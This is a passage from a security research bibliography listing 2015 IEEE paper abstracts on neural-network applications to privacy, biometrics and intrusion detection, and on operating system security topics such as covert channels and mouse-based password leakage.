expert system; home appliances; relay node based heer protocol; data storage; TORA security; data aggregation; low energy adaptive stable energy efficient protocol; fuzzy logic based clustering algorithm; hybrid evolutionary MPLS tunneling algorithm; English mobile teaching; eigenvector centrality; genetic algorithms; data mining; heart disease prediction; lossless data compression; reconfigurable ring resonator; triple band stacked patch antenna; energy based spectrum sensing; cognitive radio networks; FPGA; knowledge representation; multiband microstrip antenna; Web indexing; HTML priority system; Web cache recommender system; e-learning; IT skill learning for visual impaired; user review data analysis; software up-gradation model; software testing; Web crawlers; secret key watermarking; WAV audio file; SRM drive; ZETA converter; fractional PID tuning; medical image reconstruction; speech recognition system; video authentication; digital forensics; content based image retrieval; image classification; hybrid wavelet transform; facial feature extraction; RBSD adder; smart home environment; generalized discrete time model; We Chat marketing; foreign language learning; carbon dioxide emission mitigation; power generation; smartphone storage enhancement; and virtualization.

keywords: Brayton cycle;IP networks;adders;aspect-oriented programming;audio watermarking;biomedical MRI;cardiology;character recognition;cloud computing;cochlear implants;cognitive radio;computational fluid dynamics;computer science education;content-based retrieval;cryptography;cyclone separators;data analysis;data compression;data mining;data privacy;diesel engines;differential equations;digital forensics;domestic appliances;drilling;educational administrative data processing;eigenvalues and eigenfunctions;enzymes;expert systems;face recognition;fault diagnosis;feature extraction;feedforward neural nets;field programmable gate arrays;fuzzy control;genetic algorithms;grammars;green computing;handicapped aids;heat exchangers;home computing;image classification;image coding;image colour analysis;image fusion;image reconstruction;image retrieval;image segmentation;image watermarking;indexing;induction motors;internetworking;iris recognition;knowledge representation;linguistics;medical image processing;microstrip antennas;mobile learning;modal analysis;nanoelectromechanical devices;object detection;ontologies (artificial intelligence);pattern clustering;power amplifiers;power supply quality;program debugging;program testing;radio spectrum management;recommender systems;reluctance motor drives;resonators;routing protocols;scheduling;self-organising feature maps;social networking (online);software reliability;speaker recognition;speech processing;storage management;telecommunication congestion control;thermoelectric conversion;three-term control;trajectory optimisation (aerospace);tumours;vehicular ad hoc networks;vibrations;video signal processing;virtual machines;virtualisation;wavelet transforms;wind power plants;wireless sensor networks;AODV based congestion control protocol;DBSCAN algorithm;English mobile teaching;FPGA;GSD;HTML priority system;IP network;IT skill learning for visual impaired;LUV color space;MANET security issues;MBSOM;MFCC;MPLS network;MR images;OdiaBraille;PID controller optimisation;RBSD adder;RGB color space;SBC;SRM drive;TORA security;VANET;WAV audio file;We Chat marketing;Web cache recommender system;Web crawlers;Web indexing;YIQ color models;ZETA converter;adaptive gateway discovery mechanism;agent based semantic ontology matching;agile SCRUM framework;aspect oriented systems;attribute based encryption;carbon dioxide emission mitigation;cellular towers;cloud data access;cluster computing;cochlear implantation;cognitive radio networks;color aerial images;communication understandability enhancement;content based image retrieval;critical health data transmission system;current signature analysis;cyclone separator CFD simulation;data aggregation;data mining;data storage;database security;diesel engines;digital forensics;e-learning;education information system;eigenvector centrality;encrypted cloud data;energy based spectrum sensing;energy smart routing protocol;enzyme classification;expert system;externally powered upper limb prostheses;facial feature extraction;feedforward neural networks;foreign language learning;fractional PID tuning;fuzzy logic based clustering algorithm;fuzzy logic controller;generalized discrete time model;genetic algorithms;green cloud computing;heart disease prediction;heat exchanger temperature process;heterogeneous online social networks;heuristic job scheduling;high speed nonvolatile NEMS memory devices;home appliances;human skin detection;hybrid evolutionary MPLS tunneling algorithm;hybrid watermarking technique;hybrid wavelet transform;image classification;image compression;image data deduplication;image fusion;image segmentation;imperfect debugging;induction motors;input power quality;iris recognition;irreversible regenerative Brayton cycle;knowledge representation;launch vehicle optimal trajectory generation;lossless data compression;low energy adaptive stable energy efficient protocol;machining parameter optimization;mechanical microdrilling;mechanical structure modal analysis;medical image reconstruction;misalignment fault detection;mobile ad hoc networks;modified LEACH protocol;moving object segmentation;multiband microstrip antenna;multikeyword based sorted querying;offline English character recognition;online movie data classification;parsing;phonetic word identification;power amplifier;power generation;privacy preservation;program test data generation;reconfigurable ring resonator;relay node based heer protocol;rule based derivational urdu stemmer usal;rule based inflectional urdu stemmer usal;secret key watermarking;self-organizing feature map;shadow detection;smart home environment;smartphone storage enhancement;software reliability growth modeling;software testing;software up-gradation model;speech recognition system;stochastic differential equation;switched reluctance motor drive;task scheduling;task set based adaptive round robin scheduling;test case selection;text dependent speaker recognition;text transcription;triple band stacked patch antenna;tumor boundary extraction;two-stage series connected thermoelectric generator;user review data analysis;vertical partitioned medical database;vibration signal based monitoring;vibration signature analysis;video authentication;virtual machine introspection;virtualization;vortex induced vibration;vulnerability discovery model;wind power plants;wireless sensor networks (ID#: 16-9258)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7155050&isnumber=7154914

 

Vukovic, M.; Skocir, P.; Katusic, D.; Jevtic, D.; Trutin, D.; Delonga, L., "Estimating real world privacy risk scenarios," in Telecommunications (ConTEL), 2015 13th International Conference on, pp. 1-7, 13-15 July 2015. doi: 10.1109/ConTEL.2015.7231214

Abstract: User privacy is becoming an issue on the Internet due to common data breaches and various security threats. Services tend to require private user data in order to provide more personalized content and users are typically unaware of potential risks to their privacy. This paper continues our work on the proposed user privacy risk calculator based on a feedforward neural network. Along with risk estimation, we provide the users with real world example scenarios that depict privacy threats according to selected input parameters. In this paper, we present a model for selecting the most probable real world scenario, presented as a comic, and thus avoid overwhelming the user with lots of information that he/she may find confusing. Most probable scenario estimations are performed by artificial neural network that is trained with real world scenarios and estimated probabilities from real world occurrences. Additionally, we group real world scenarios into categories that are presented to the user as further reading regarding privacy risks.

keywords: data privacy;feedforward neural nets;learning (artificial intelligence);probability;artificial neural network training;data breach;feed-forward neural network;input parameter selection;personalized content;privacy risks;privacy threats;private user data;probabilities;real-world privacy risk scenario estimation;risk estimation;security threats;user privacy;user privacy risk calculator;Calculators;Electronic mail;Estimation;Internet;Law;Privacy (ID#: 16-9259)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7231214&isnumber=7231179

 

Cuiling Jiang; Yilin Pang; Anwen Wu, "A Novel Robust Image-Hashing Method for Content Authentication," in Security and Privacy in Social Networks and Big Data (SocialSec), 2015 International Symposium on, pp. 22-27, 16-18 Nov. 2015. doi: 10.1109/SocialSec2015.15

Abstract: Image hash functions find extensive application in content authentication, database search, and digital forensic. This paper develops a novel robust image-hashing method based on genetic algorithm (GA) and Back Propagation (BP) Neural Network for content authentication. Lifting wavelet transform is used to extract image low frequency coefficients to create the image feature matrix. A GA-BP network model is constructed to generate image-hashing code. Experimental results demonstrate that the proposed hashing method is robust against random attack, JPEG compression, additive Gaussian noise, and so on. Receiver operating characteristics (ROC) analysis over a large image database reveals that the proposed method significantly outperforms other approaches for robust image hashing.

keywords: Gaussian noise;authorisation;backpropagation;cryptography;data compression;genetic algorithms;image coding;neural nets;sensitivity analysis;wavelet transforms;GA-BP network model;JPEG compression;ROC;additive Gaussian noise;back propagation neural network;content authentication;database search;digital forensic;genetic algorithm;image database;image feature matrix;image hash functions;image low frequency coefficients extract;image-hashing code;lifting wavelet transform;receiver operating characteristics analysis;robust image-hashing method;Authentication;Feature extraction;Genetic algorithms;Robustness;Training;Wavelet transforms;BP network;discrimination;genetic algorithm;image hash (ID#: 16-9260)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7371895&isnumber=7371823

 

Damasceno, M.; Canuto, A.M.P.; Poh, N., "Multi-privacy biometric protection scheme using ensemble systems," in Neural Networks (IJCNN), 2015 International Joint Conference on, pp. 1-8, 12-17 July 2015. doi: 10.1109/IJCNN.2015.7280657

Abstract: Biometric systems use personal biological or behavioural traits that can uniquely characterise an individual but this uniqueness property also becomes its potential weakness when the template characterising a biometric trait is stolen or compromised. To this end, we consider two strategies to improving biometric template protection and performance, namely, (1) using multiple privacy schemes and (2) using multiple matching algorithms. While multiple privacy schemes can improve the security of a biometric system by protecting its template; using multiple matching algorithms or similarly, multiple biometric traits along with their respective matching algorithms, can improve the system performance due to reduced intra-class variability. The above two strategies lead to a novel, ensemble system that is derived from multiple privacy schemes. Our findings suggest that, under the worst-case scenario evaluation where the key or keys protecting the template are stolen, multi-privacy protection scheme can outperform a single protection scheme as well as the baseline biometric system without template protection.

keywords: biometrics (access control);data privacy;behavioural traits;biological traits;biometric template protection;ensemble systems;multiple matching algorithms;multiprivacy biometric protection;worst-case scenario evaluation;Biology;Training (ID#: 16-9261)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7280657&isnumber=7280295

 

Boyang Li; Chen Liu, "Parallel BP Neural Network on Single-chip Cloud Computer," in High Performance Computing and Communications (HPCC), 2015 IEEE 7th International Symposium on Cyberspace Safety and Security (CSS), 2015 IEEE 12th International Conference on Embedded Software and Systems (ICESS), 2015 IEEE 17th International Conference on, pp. 1871-1875, 24-26 Aug. 2015. doi: 10.1109/HPCC-CSS-ICESS.2015.280

Abstract: Neural network has been a clear focus in machine learning area. Back propagation (BP) method is frequently used in neural network training. In this work we paralleled BP neural network on Single-Chip Cloud Computer (SCC), an experimental processor created by Intel Labs, and analyzed multiple metrics under different configurations. We also varied the number of neurons (nodes) in the hidden layer of the BP neural networks and studied the impact. The experiment results show that a better performance can be obtained with SCC, especially when there are more nodes in the hidden layer of BP neural network. A low voltage and frequency configuration contributes to a low power per speedup. What is more, a medium voltage and frequency configuration contributes to both a low energy consumption and energy-delay product.

keywords: backpropagation;cloud computing;learning (artificial intelligence);Intel Labs;SCC;back propagation method;machine learning;parallel BP neural network;single-chip cloud computer;Biological neural networks;Computers;Energy consumption;Frequency-domain analysis;Power demand;Training;Back Propagation;Energy-Aware Computing;Neural Netork;Power-Aware Computing;Single-chip Cloud Computer (ID#: 16-9262)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7336445&isnumber=7336120

 

Manem, H.; Beckmann, K.; Min Xu; Carroll, R.; Geer, R.; Cady, N.C., "An extendable multi-purpose 3D neuromorphic fabric using nanoscale memristors," in Computational Intelligence for Security and Defense Applications (CISDA), 2015 IEEE Symposium on, pp. 1-8, 26-28 May 2015. doi: 10.1109/CISDA.2015.7208625

Abstract: Neuromorphic computing offers an attractive means for processing and learning complex real-world data. With the emergence of the memristor, the physical realization of cost-effective artificial neural networks is becoming viable, due to reduced area and increased performance metrics than strictly CMOS implementations. In the work presented here, memristors are utilized as synapses in the realization of a multi-purpose heterogeneous 3D neuromorphic fabric. This paper details our in-house memristor and 3D technologies in the design of a fabric that can perform real-world signal processing (i.e., image/video etc.) as well as everyday Boolean logic applications. The applicability of this fabric is therefore diverse with applications ranging from general-purpose and high performance logic computing to power-conservative image detection for mobile and defense applications. The proposed system is an area-effective heterogeneous 3D integration of memristive neural networks, that consumes significantly less power and allows for high speeds (3D ultra-high bandwidth connectivity) in comparison to a purely CMOS 2D implementation. Images and results provided will illustrate our state of the art 3D and memristor technology capabilities for the realization of the proposed 3D memristive neural fabric. Simulation results also show the results for mapping Boolean logic functions and images onto perceptron based neural networks. Results demonstrate the proof of concept of this system, which is the first step in the physical realization of the multi-purpose heterogeneous 3D memristive neuromorphic fabric.

keywords: Boolean functions;CMOS integrated circuits;fabrics;memristors;neural chips;perceptrons;signal processing;three-dimensional integrated circuits;3D memristive neural fabric;3D technology;Boolean logic function application;CMOS implementation;area effective heterogeneous 3D integration;artificial neural network;complementary metal oxide semiconductor;defense application;extendable multipurpose 3D neuromorphic fabric;logic computing;memristive neural network;mobile application;nanoscale memristor;neuromorphic computing;perceptron;power conservative image detection;signal processing;Decision support systems;Fabrics;Memristors;Metals;Neuromorphics;Neurons;Three-dimensional displays;3D integrated circuits;Neuromorphics;image processing;memristor;nanoelectronics;neural networks (ID#: 16-9263)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7208625&isnumber=7208613

 

Tankasala, S.P.; Doynov, P., "Multi scale multi directional shear operator for personal recognition using Conjunctival vasculature," in Technologies for Homeland Security (HST), 2015 IEEE International Symposium on, pp. 1-6, 14-16 April 2015. doi: 10.1109/THS.2015.7225292

Abstract: In this paper, we present the results of a study on utilization of Conjunctival vasculature pattern as a biometric modality for personal identification. The visible red blood vessel patterns on the sclera of the eye is gaining acceptance as a biometric modality due to its proven uniqueness and easy accessibility for imaging in the visible spectrum. After acquisition, the images of Conjunctival vascular patterns are enhanced using the difference of Gaussian (DoG). The feature extraction is performed using a multi-scale, multi-directional shear operator (Shearlet transform). Linear discriminant analysis (LDA), neural networks (NN) and pairwise distance metrics were used for classification. In the study, images of 50 subjects are acquired with a DSLR camera at different gazes and multiple distances (CIBIT-I dataset). Additionally, the performance of the proposed algorithms is tested using different gaze images acquired from 35 subjects using an iPhone (CIBIT-II dataset). ROC AUC analysis is used to test the classification performance. Areas under the curve (AUC) and equal error rates (EER) are reported for all acquisition scenarios and different processing algorithms. The best EER value of 0.29% is obtained for a CIBIT-I dataset using NN and a 2.44% EER value for a CIBIT-II dataset using LDA.

keywords: Gaussian processes;biometrics (access control);blood vessels;error statistics;eye;feature extraction;image classification;image segmentation;neural nets;transforms;CIBIT-I dataset;CIBIT-II dataset;DSLR camera;DoG;EER value;LDA;ROC AUC analysis;Shearlet transform;areas under the curve;biometric modality;classification performance;conjunctival vasculature pattern;difference of Gaussian;equal error rate;eye;feature extraction;gaze images;iPhone;image classification;linear discriminant analysis;multiscale multidirectional shear operator;neural network;pairwise distance metric;personal identification;personal recognition;red blood vessel pattern;sclera;visible spectrum;Artificial neural networks;Cameras;Feature extraction;Image segmentation;Measurement;Transforms;Biometrics;Conjunctival vasculature;Difference of Gaussian;Linear discriminant analysis;Neural Networks;Ocular biometrics;Shearlet transforms (ID#: 16-9264)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7225292&isnumber=7190491

 

Adenusi, D.; Kuboye, B.M.; Alese, B.K.; Thompson, A.F.-B., "Development of cyber situation awareness model," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-11, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166135

Abstract: This study designed and simulated cyber situation awareness model for gaining experience of cyberspace condition. This was with a view to timely detecting anomalous activities and taking proactive decision safeguard the cyberspace. The situation awareness model was modelled using Artificial Intelligence (AI) technique. The cyber situation perception sub-model of the situation awareness model was modelled using Artificial Neural Networks (ANN). The comprehension and projection submodels of the situation awareness model were modelled using Rule-Based Reasoning (RBR) techniques. The cyber situation perception sub-model was simulated in MATLAB 7.0 using standard intrusion dataset of KDD'99. The cyber situation perception sub-model was evaluated for threats detection accuracy using precision, recall and overall accuracy metrics. The simulation result obtained for the performance metrics showed that the cyber-situation sub-model of the cybersituation model better with increase in number of training data records. The cyber situation model designed was able to meet its overall goal of assisting network administrators to gain experience of cyberspace condition. The model was capable of sensing the cyberspace condition, perform analysis based on the sensed condition and predicting the near future condition of the cyberspace.

keywords: artificial intelligence;inference mechanisms;knowledge based systems;mathematics computing;neural nets;security of data;AI technique;ANN;Matlab 7.0;RBR techniques;anomalous activities detection;artificial intelligence;artificial neural networks;cyber situation awareness model;cyberspace condition;proactive decision safeguard;rule-based reasoning;training data records;Artificial neural networks;Computational modeling;Computer security;Cyberspace;Data models;Intrusion detection;Mathematical model;Artificial Intelligence;Awareness;cyber-situation;cybersecurity;cyberspace 9265) 9265)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166135&isnumber=7166109

 

Seemakurthi, P.; Shuhao Zhang; Yibing Qi, "Detection of fraudulent financial reports with machine learning techniques," in Systems and Information Engineering Design Symposium (SIEDS), 2015, pp. 358-361, 24-24 April 2015. doi: 10.1109/SIEDS.2015.7117005

Abstract: This paper describes our efforts to apply various advanced supervised machine learning and natural language processing techniques, including Binomial Logistic Regression, Support Vector Machines, Neural Networks, Ensemble Techniques, and Latent Dirichlet Allocation (LDA), to the problem of detecting fraud in financial reporting documents available from the United States' Security and Exchange Commission EDGAR database. Specifically, we apply LDA to a collection of type 10-K financial reports and to generate document-topic frequency matrix, and then submit these data to a series of advanced classification algorithms. We then apply evaluation metrics, such as Precision, Receiver Operating Characteristic Curve, and Area Under the Curve to evaluate the performance of each algorithm. We conclude that these methods show promise and suggest applying the approach to a larger set of input documents.

keywords: document handling;financial data processing;fraud;learning (artificial intelligence);matrix algebra;natural language processing;neural nets;pattern classification;regression analysis;security of data;support vector machines;EDGAR database;LDA;Security and Exchange Commission;United States;area under the curve;binomial logistic regression;classification algorithms;document-topic frequency matrix;ensemble techniques;evaluation metrics;financial reporting documents;fraudulent financial reports detection;latent Dirichlet allocation;natural language processing techniques;neural networks;precision;receiver operating characteristic curve;supervised machine learning techniques;support vector machines;Accuracy;Classification algorithms;Correlation;Logistics;Natural language processing;Neural networks;Support vector machines;Ensemble;Financial Fraud Detection;Latent Dirichlet Allocation;Machine Learning;Natural Language Processing;Support Vector Machines (ID#: 16-9266)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7117005&isnumber=7116953

 

Khalifa, A.A.; Hassan, M.A.; Khalid, T.A.; Hamdoun, H., "Comparison between mixed binary classification and voting technique for active user authentication using mouse dynamics," in Computing, Control, Networking, Electronics and Embedded Systems Engineering (ICCNEEE), 2015 International Conference on, pp. 281-286, 7-9 Sept. 2015. doi: 10.1109/ICCNEEE.2015.7381378

Abstract: The rapid proliferation of computing processing power has facilitated a rise in the adoption of computers in various aspects of human lives. From education to shopping and other everyday activities to critical applications in finance, banking and, recently, degree awarding online education. Several approaches for user authentication based on Behavioral Biometrics (BB) were suggested in order to identify unique signature/footprint for improved matching accuracy for genuine users and flagging for abnormal behaviors from intruders. In this paper we present a comparison between two classification algorithms for identifying users' behavior using mouse dynamics. The algorithms are based on support vector machines (SVM) classifier allowing for direct comparison between different authentication-based metrics. The voting technique shows low False Acceptance Rate(FAR) and noticeably small learning time; making it more suitable for incorporation within different authentication applications.

keywords: behavioural sciences computing;government data processing;learning (artificial intelligence);mouse controllers (computers);pattern classification;security of data;support vector machines;FAR;SVM;active user authentication;behavioral biometrics;false acceptance rate;learning time;mixed binary classification;mouse dynamics;support vector machine;voting technique;Artificial neural networks;Biometrics (access control);active authentication;machine learning;mouse dynamics;pattern recognition;support vector machines (ID#: 16-9267)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381378&isnumber=7381351

 

Parker, G.G.; Weaver, W.W.; Robinett, R.D.; Wilson, D.G., "Optimal DC microgrid power apportionment and closed loop storage control to mitigate source and load transients," in Resilience Week (RWS), 2015, pp. 1-7, 18-20 Aug. 2015. doi: 10.1109/RWEEK.2015.7287420

Abstract: This paper considers the optimal management of an N source, DC microgrid with time-varying sources and loads. Optimality is defined as minimizing the amount of power lost through the boost converters that connect the N sources to the DC bus. The optimal power apportionment strategy is part of an overall grid management system that also includes control laws that manage bus voltage and boost currents using distributed energy storage. The performance of an optimal power apportionment strategy is compared to an existing, alternate approach using a three source simulation for both source and load step transients. The optimal power apportionment strategy is shown to use less power while maintaining bus voltage in the presence of both load and source transients. Since the optimal solution requires information exchange between all the sources, there is an opportunity for malicious attack. The ability of the strategy to maintain the desired bus voltage in the presence of an uncommunicated source failure is also presented.

keywords: closed loop systems;distributed power generation;electric current control;failure analysis;load regulation;optimal control;power control;power distribution control;power distribution faults;power system security;voltage control;bus voltage management;closed loop storage control;current boosting;distributed energy storage;load transient mitigation;malicious attack;optimal DC microgrid power apportionment;overall grid management system;power lost amount minimization;source transient mitigation;uncommunicated source failure;Computational modeling;Energy storage;Feedforward neural networks;Microgrids;Steady-state;Transient analysis;Voltage control (ID#: 16-9268)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7287420&isnumber=7287407


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Operating System Security 2015

 

 
SoS Logo

Operating Systems Security 2015

 

Operating system security is a component of resiliency, composability, and an area of concern for predictive metrics.  The work cited here was presented in 2015.


Y. Lin; S. Malik; K. Bilal; Q. Yang; Y. Wang; S. Khan, "Designing and Modeling of Covert Channels in Operating Systems," in IEEE Transactions on Computers, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TC.2015.2458862

Abstract: Covert channels are widely considered as a major risk of information leakage in various operating systems, such as desktop, cloud, and mobile systems. The existing works of modeling covert channels have mainly focused on using Finite State Machines(FSMs)and their transforms to describe the process of covert channel transmission. However, a FSM is rather an abstract model, where information about the shared resource, synchronization, and encoding/decoding cannot be presented in the model, making it difficult for researchers to realize and analyze the covert channels. In this paper, we use the High-Level Petri Nets (HLPN) to model the structural and behavioral properties of covert channels. We use the HLPN to model the classic covert channel protocol. Moreover, the results from the analysis of the HLPN model are used to highlight the major shortcomings and interferences in the protocol. Furthermore, we propose two new covert channel models, namely: (a)TwoChannel Transmission Protocol (TCTP) model and(b)Self-Adaptive Protocol (SAP) model. The TCTP model circumvents the mutual inferences in encoding and synchronization operations; where as the SAP model uses sleeping time and redundancy check to ensure correct transmission in an environment with strong noise. To demonstrate the correctness and usability of our proposed models in heterogeneous environments, we implement the TCTP and SAP in three different systems: (a)Linux, (b)Xen, and (c)Fiasco. OC. Our implementation also indicates the practicability of the models in heterogeneous, scalable and flexible environments.

Keywords: Analytical models; Computational modeling; Mathematical model; Operating systems; Petri nets; Protocols; Receivers; covert channels; high-level Petri nets (HLPN); modeling and security; operating systems (ID#: 16-9502)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7169547&isnumber=4358213

 

H. Sun; F. Zhao; H. Wang; K. Wang; W. Jiang; Q. Guo; B. Zhang; L. Wehenkel, "Automatic Learning of Fine Operating Rules for Online Power System Security Control," in IEEE Transactions on Neural Networks and Learning Systems, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TNNLS.2015.2390621

Abstract: Fine operating rules for security control and an automatic system for their online discovery were developed to adapt to the development of smart grids. The automatic system uses the real-time system state to determine critical flowgates, and then a continuation power flow-based security analysis is used to compute the initial transfer capability of critical flowgates. Next, the system applies the Monte Carlo simulations to expected short-term operating condition changes, feature selection, and a linear least squares fitting of the fine operating rules. The proposed system was validated both on an academic test system and on a provincial power system in China. The results indicated that the derived rules provide accuracy and good interpretability and are suitable for real-time power system security control. The use of high-performance computing systems enables these fine operating rules to be refreshed online every 15 min.

Keywords: Learning systems; Power system security; Power transmission lines; Real-time systems; Substations; Automatic learning; critical flowgate; knowledge discovery; online security analysis; smart grid; total transfer capability (ID#: 16-9503)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7036063&isnumber=6104215

 

C. W. Wang; C. W. Wang; S. W. Shieh, "ProbeBuilder: Uncovering Opaque Kernel Data Structures for Automatic Probe Construction," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2416728

Abstract: VM-based inspection tools generally implement probes in the hypervisor to monitor events and the state of kernel of the guest system. The most important function of a probe is to carve information of interest out of the memory of the guest when it is triggered. Implementing probes for a closed-source OS demands manually reverse-engineering the undocumented code/data structures in the kernel binary image. Furthermore, the reverse-engineering result is often non-reusable between OS versions or even kernel updates due to the rapid change of these structures. In this paper, we propose ProbeBuilder, a system automating the process to inference kernel data structures. Based on dynamic execution, ProbeBuilder searches for data structures matching the “pointer-offset-pointer” pattern in guest memory. The sequences of these offsets, which are referred to as dereferences, are then verified by ProbeBuilder with instruction evidence that traverse them. The experiment on Windows kernel shows that ProbeBuilder efficiently narrows thousands of choices for kernel-level probes down to dozens. The finding allows analysts to quickly implement probes, facilitating rapid development/update of inspection tools for different OSes. With these features, ProbeBuilder is the first system capable of automatically generating practical probes that extracts information through dereferences to opaque kernel data structures

Keywords: Data structures; Kernel; Monitoring; Pattern matching; Probes; Virtual machine monitors; D.2.5 [Software Engineering]: Testing and Debugging - Monitors; D.4.6 [Operating System]: Security and Privacy Protection - Invasive Software (ID#: 16-9504)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7069236&isnumber=4358699

 

B. Krupp; N. Sridhar; W. Zhao, "SPE: Security and Privacy Enhancement Framework for Mobile Devices," in IEEE Transactions on Dependable and Secure Computing, vol.  PP,  no. 99, pp.  1-1, 2015. doi: 10.1109/TDSC.2015.2465965

Abstract: In this paper, we present a security and privacy enhancement (SPE) framework for unmodified mobile operating systems. SPE introduces a new layer between the application and the operating system and does not require a device be jailbroken or utilize a custom operating system. We utilize an existing ontology designed for enforcing security and privacy policies on mobile devices to build a policy that is customizable. Based on this policy, SPE provides enhancements to native controls that currently exist on the platform for privacy and security sensitive components. SPE allows access to these components in a way that allows the framework to ensure the application is truthful in its declared intent and ensure that the user’s policy is enforced. In our evaluation we verify the correctness of the framework and the computing impact on the device. Additionally, we discovered security and privacy issues in several open source applications by utilizing the SPE Framework. From our findings, if SPE is adopted by mobile operating systems producers, it would provide consumers and businesses the additional privacy and security controls they demand and allow users to be more aware of security and privacy issues with applications on their devices.

Keywords: Mobile handsets; Multimedia communication; Ontologies; Operating systems; Privacy; Security; Sensors; Mobile Privacy; Mobile Security; Sensing (ID#: 16-9505)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7182290&isnumber=4358699

 

X. Pan; Z. Ling; A. Pingley; W. Yu; K. Ren; N. Zhang; X. Fu, "Password Extraction via Reconstructed Wireless Mouse Trajectory," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2413410

Abstract: Logitech made the following statement in 2009: “Since the displacements of a mouse would not give any useful information to a hacker, the mouse reports are not encrypted.” In this paper, we prove the exact opposite is true - i.e., it is indeed possible to leak sensitive information such as passwords through the displacements of a Bluetooth mouse. Our results can be easily extended to other wireless mice using different radio links. We begin by presenting multiple ways to sniff unencrypted Bluetooth packets containing raw mouse movement data.We then show that such data may reveal text-based passwords entered by clicking on software keyboards. We propose two attacks, the prediction attack and replay attack, which can reconstruct the on-screen cursor trajectories from sniffed mouse movement data. Two inference strategies are used to discover passwords from cursor trajectories. We conducted a holistic study over all popular operating systems and analyzed how mouse acceleration algorithms and packet losses may affect the reconstruction results. Our real-world experiments demonstrate the severity of privacy leakage from unencrypted Bluetooth mice. We also discuss countermeasures to prevent privacy leakage from wireless mice. To the best of our knowledge, our work is the first to demonstrate privacy leakage from raw mouse data.

Keywords: Acceleration; Bluetooth; Computers; Mice; Operating systems; Prediction algorithms; Trajectory; Mouse; Password; Privacy; Security; Sniffing; Trajectory (ID#: 16-9506)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7061471&isnumber=4358699

 

A. Homescu; T. Jackson; S. Crane; S. Brunthaler; P. Larsen; M. Franz, "Large-scale Automated Software Diversity—Program Evolution Redux," in IEEE Transactions on Dependable and Secure Computing, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TDSC.2015.2433252

Abstract: The software monoculture favors attackers over defenders, since it makes all target environments appear similar. Code-reuse attacks, for example, rely on target hosts running identical software. Attackers use this assumption to their advantage by automating parts of creating an attack. This article presents large-scale automated software diversification as a means to shore up this vulnerability implied by our software monoculture. Besides describing an industrial-strength implementation of automated software diversity, we introduce methods to objectively measure the effectiveness of diversity in general, and its potential to eliminate code-reuse attacks in particular.

Keywords: Browsers; Entropy; Operating systems; Program processors; Programming; Security; Biologically-inspired defenses; artificial software diversity; code reuse attacks; jump-oriented programming; return-oriented programming (ID#: 16-9507)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7122891&isnumber=4358699

 

Y. Li; W. Dai; Z. Ming; M. Qiu, "Privacy Protection for Preventing Data Over-Collection in Smart City," in IEEE Transactions on Computers, vol. PP, no. 99, pp. 1-1, 2015. doi: 10.1109/TC.2015.2470247

Abstract: In smart city, all kinds of users’ data are stored in electronic devices to make everything intelligent. A smartphone is the most widely used electronic device and it is the pivot of all smart systems. However, current smartphones are not competent to manage users’ sensitive data, and they are facing the privacy leakage caused by data over-collection. Data over-collection, which means smartphones apps collect users’ data more than its original function while within the permission scope, is rapidly becoming one of the most serious potential security hazards in smart city. In this paper, we study the current state of data over-collection and study some most frequent data over-collected cases. We present a mobile-cloud framework, which is an active approach to eradicate the data over-collection. By putting all users’ data into a cloud, the security of users’ data can be greatly improved. We have done extensive experiments and the experimental results have demonstrated the effectiveness of our approach.

Keywords: Data privacy; Mobile communication; Operating systems; Privacy; Security; Smart phones; Cyber Security and Privacy; Data Over-Collection; Smart City; Smartphone (ID#: 16-9508)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7210166&isnumber=4358213

 

G. Anagnostou; B. C. Pal, "Impact of Overexcitation Limiters on the Power System Stability Margin Under Stressed Conditions," in IEEE Transactions on Power Systems, vol. PP, no. 99, pp. 1-11, 2015. doi: 10.1109/TPWRS.2015.2440559

Abstract: This paper investigates the impact of the overexcitation limiters (OELs) on the stability margin of a power system which is operating under stressed conditions. Several OEL modeling approaches are presented and the effect of their action has been examined in model power systems. It is realized that, more often than not, OEL operating status goes undetected by existing dynamic security assessment tools commonly used in the industry. It is found that the identification and accurate representation of OELs lead to significantly different transient stability margins. Unscented Kalman filtering is used to detect the OEL activation events. In the context of stressed system operation, such quantitative assessment is very useful for system control. This understanding is further reinforced through detailed studies in two model power systems.

Keywords: Generators; Mathematical model; Power system stability; Stability criteria; Transient analysis; Kalman filters; power system dynamics; power system security; stability criteria (ID#: 16-9509)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7128744&isnumber=4374138

 

